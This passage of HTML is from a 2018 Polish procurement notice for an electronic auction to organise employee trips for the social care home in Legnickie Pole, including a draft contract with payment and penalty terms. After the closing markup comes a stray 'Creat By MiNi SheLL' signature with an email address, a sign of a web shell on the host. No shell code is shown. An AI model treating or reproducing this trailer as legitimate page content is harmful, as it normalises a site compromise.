Wykonawcy. W celu ustalenia zaoferowanej ceny brutto za przedmiot licytacji - wynagrodzenie netto zaproponowane w ofercie zwycięskiej zostanie zwiększone o należną stawkę podatku VAT.</span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja jednoetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani">Nie</span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data">2018-02-26</span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"> 10:00:00</span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12">5 dni po terminie przekazania zaproszeń </span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13">1.Termin zamknięcia licytacji upływa 10 minut po złożeniu ostatniego postąpienia. 2. Po zamknięciu licytacji elektronicznej Zamawiający na stronie internetowej http://www.dpslp.nbip.pl/dpslp/ poda nazwę oraz adres Wykonawcy, którego ofertę wybrano jako najkorzystniejszą. 3. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy zobowiązany jest przedstawić Zmawiającemu kalkulację ceny - wg załącznika nr 1 do umowy. </span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">Umowa stanowi co następuje:Projekt umowyUMOWA nr...............z dnia ....2018 rokuzawarta w wyniku przeprowadzonego postepowania w trybie licytacji elektronicznej o numerze 230-2-3/18,pomiędzy: Powiatem Legnickim Plac Słowiański 1, 59-220 Legnica NIP 691-22-26-286reprezentowanym przez:1.	Dyrektora Domu Pomocy Społecznej w Legnickim Polu Dariusza Wojtkowiaka przy kontrasygnacie finansowej Danuty Czyszczoń - Głównego Księgowegozwanym dalej ,,Zamawiającym".aNIP ...............................REGON ..........................PESEL*............................Nr rachunku bankowego: ............................................reprezentowanym przez:.............................................zwanym dalej ,,Wykonawcą"Umowa stanowi co następuje:§ 11.Przedmiotem zamówienia jest usługa organizacji wypoczynku dla pracowników Domu Pomocy Społecznej w Legnickim Polu i ich rodzin w 2018 r. Na zadanie składa się:a)zorganizowanie 8-dniowej wycieczki do Hiszpanii w region Costa Brava w terminie 30.04-07.05.2018 r. dla 54 osób.b) zorganizowanie kolonii w Mrzeżynie w dniach 17-28.07.2018 r. dla 10 osób.c) zorganizowanie kolonii/obozu w Hiszpanii i w dniach 11.07-22.07.2018 r. dla 33 osób.d) zorganizowanie 3-dniowej wycieczki na Podkarpacie i Roztocze w dniach 07-09.09.2018 r. dla 55 osób.2. Zamawiający zastrzega sobie prawo zmiany ilości osób biorących w organizowanym wypoczynku i zobowiązuje się poinformować o tym Wykonawcę najpóźniej na: a) 21 dni przed planowaną wycieczką określoną w § 1 pkt. 1a i 1 d.b) 14 dni przed planowanym wypoczynkiem określonym w § 1 pkt. 1b.3.Termin realizacji umowy: od podpisania do 09.09.2018 r.4.Wykonawca w terminie do 21 dni przed planowanym wypoczynkiem określonym w pkt. 1 b i 1 c przedłoży Zamawiającemu imienny wykaz osób uczestniczących w wykonaniu zamówienia (data oraz miejsce urodzenia).§ 21.Wykonawca zobowiązuje się zapewnić zorganizowanie wypoczynku dla pracowników Domu Pomocy Społecznej w Legnickim Polu i ich rodzin w 2018 r. zgodnie ze szczegółowym opisem przedmiotu zamówienia- załącznikiem nr 5 do Ogłoszenia o zamówieniu, który stanowi integralną część umowy,§ 31.Strony uzgadniają wynagrodzenie umowne na kwotę .........zł brutto. Słownie:.........................................................................................zł.w tym: a) zorganizowanie 8-dniowej wycieczki do Hiszpanii w region Costa Brava w terminie 30.04-07.05.2018 r. Wynagrodzenie umowne w wysokości .............................zł będzie płatne przelewem na konto Wykonawcy po otrzymaniu faktury (80 % wynagrodzenia w dniu wyjazdu, 20 % wynagrodzenia po zrealizowaniu usługi).b) zorganizowanie kolonii w Mrzeżynie w dniach 17-28.07.2018 r. Wynagrodzenie umowne w wysokości .............................zł płatne przelewem na konto Wykonawcy po otrzymaniu faktury (80 % wynagrodzenia w pierwszym dniu roboczym od dnia wyjazdu, 20 % wynagrodzenia po zrealizowaniu usługi).c) zorganizowanie kolonii/obozu w Hiszpanii w dniach 11.07-22.07.2018 r. Wynagrodzenie umowne w wysokości .............................zł płatne przelewem na konto Wykonawcy po otrzymaniu faktury (80 % wynagrodzenia w pierwszym dniu roboczym od dnia wyjazdu 20 % wynagrodzenia po zrealizowaniu usługi).d) zorganizowanie 3-dniowej wycieczki na Podkarpacie i Roztocze w dniach 07-09.09.2018 r. Wynagrodzenie umowne w wysokości .............................zł płatne przelewem na konto Wykonawcy po otrzymaniu faktury (80 % wynagrodzenia w pierwszym dniu roboczym od dnia wyjazdu 20 % wynagrodzenia po zrealizowaniu usługi).2. W przypadku zmiany ilości osób biorących udział w organizowanym wypoczynku, ulegnie zmianie kwota wynagrodzenia dla Wykonawcy.3. Faktury będą wystawiane w następujący sposób: Nabywca: Powiat Legnicki, ul. Plac Słowiański 1, 59-220 Legnica, NIP 691-22-26-286, Odbiorca: Dom Pomocy Społecznej w Legnickim Polu, ul. Benedyktynów 4, 59-241 Legnickie Pole.4.Wykonawca w okresie obowiązywania umowy zobowiązany jest posiadać aktualne (ciągłe) ubezpieczenie od odpowiedzialności cywilnej (OC) z tytułu wykonywanej działalności.5. W przypadku upływu okresu ubezpieczenia (o którym mowa w ust. 4) w trakcie obowiązywania niniejszej umowy, Wykonawca jest każdorazowo zobowiązany do niezwłocznego przedłożenia Zamawiającemu dokumentu ubezpieczeniowego potwierdzającego objęcie w/w ubezpieczeniem na kolejny okres. § 41.Wykonawca zapłaci Zamawiającemu kary umowne za nienależyte wykonanie przedmiotu umowy - w wysokości: 10 % całego wynagrodzenia umownego brutto wynikającego z § 3 pkt 1 umowy.2.Za odstąpienie od umowy z przyczyn obciążających Wykonawcę, Wykonawca jest obowiązany zapłacić Zamawiającemu karę umowną w wysokości 10 % wartości brutto przedmiotu umowy określonej § 3 pkt.3.Kara powyższa nie podlega sumowaniu z innymi karami.	4.Zamawiający może odstąpić od umowy, jeżeli Wykonawca nie przystąpił do wykonania przedmiotu. W takim przypadku Wykonawca jest obowiązany zapłacić Zamawiającemu karę umowną w wysokości 10 % wartości brutto przedmiotu umowy.5.Za odstąpienie od umowy z przyczyn zawinionych przez Zamawiającego, Zamawiający wypłaci Wykonawcy karę umowną w wysokości 10 % wartości brutto przedmiotu umowy § 3 pkt 1.6.Jeżeli kara nie pokrywa szkody, Zamawiający może dochodzić odszkodowania na zasadach ogólnych.7.Wykonawca wyraża zgodę na potrącenie kar umownych z przysługującego mu wynagrodzenia.§ 51. Spory wynikłe na tle realizacji niniejszej umowy rozstrzygane będą przez Sądy Powszechne w Legnicy, właściwe ze względu na siedzibę Zamawiającego.2. Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają, pod rygorem nieważności, zachowania formy pisemnej.3. W sprawach nieuregulowanych w niniejszej umowie będą miały zastosowanie przepisy Kodeksu Cywilnego.4. Niniejszą umowę sporządzono w 3-ch jednobrzmiących egzemplarzach: 2 egz. dla Zamawiającego, 1 egz. dla Wykonawcy.</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy</span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony">Zamawiający nie ujawnia informacji stanowiących tajemnicę przedsiębiorstwa, w rozumieniu art. 11 ust. 4 ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t. j. Dz. U. z 2003 r. Nr 153, poz. 1503 z późn. zm.), jeżeli Wykonawca nie później niż w terminie składania ofert zastrzegł, że nie mogą one być udostępnione. W związku z powyższym Wykonawca zobowiązany jest do wypełnienia odpowiedniego punktu we Wniosku o dopuszczenie do licytacji elektronicznej. Zastrzeżone informacje winny być odpowiednio oznaczone na właściwym dokumencie z widocznym napisem: ,,tajemnica przedsiębiorstwa" i złożone w odrębnej kopercie wewnętrznej, a na ich miejscu w dokumentacji należy zamieścić stosowne odsyłacze. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 u.p.z.p. </span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-02-26</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Załącznikami do niniejszego ogłoszenia, udostępnionymi na stronie Zamawiającego są: wniosek o dopuszczenie do udziału w licytacji elektronicznej- załącznik nr 1 Oświadczenie wykonawcy dotyczące spełniania warunków udziału w postepowaniu- załącznik nr 2 Oświadczenie wykonawcy dotyczące przesłanek wykluczenia- załącznik nr 3 Oświadczenie o przynależności/braku przynależności do grupy kapitałowej- załącznik nr 4 Opis przedmiotu zamówienia- załącznik nr 5 Wykaz usług -załącznik nr 6 Wzór umowy- załącznik nr 7 </span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com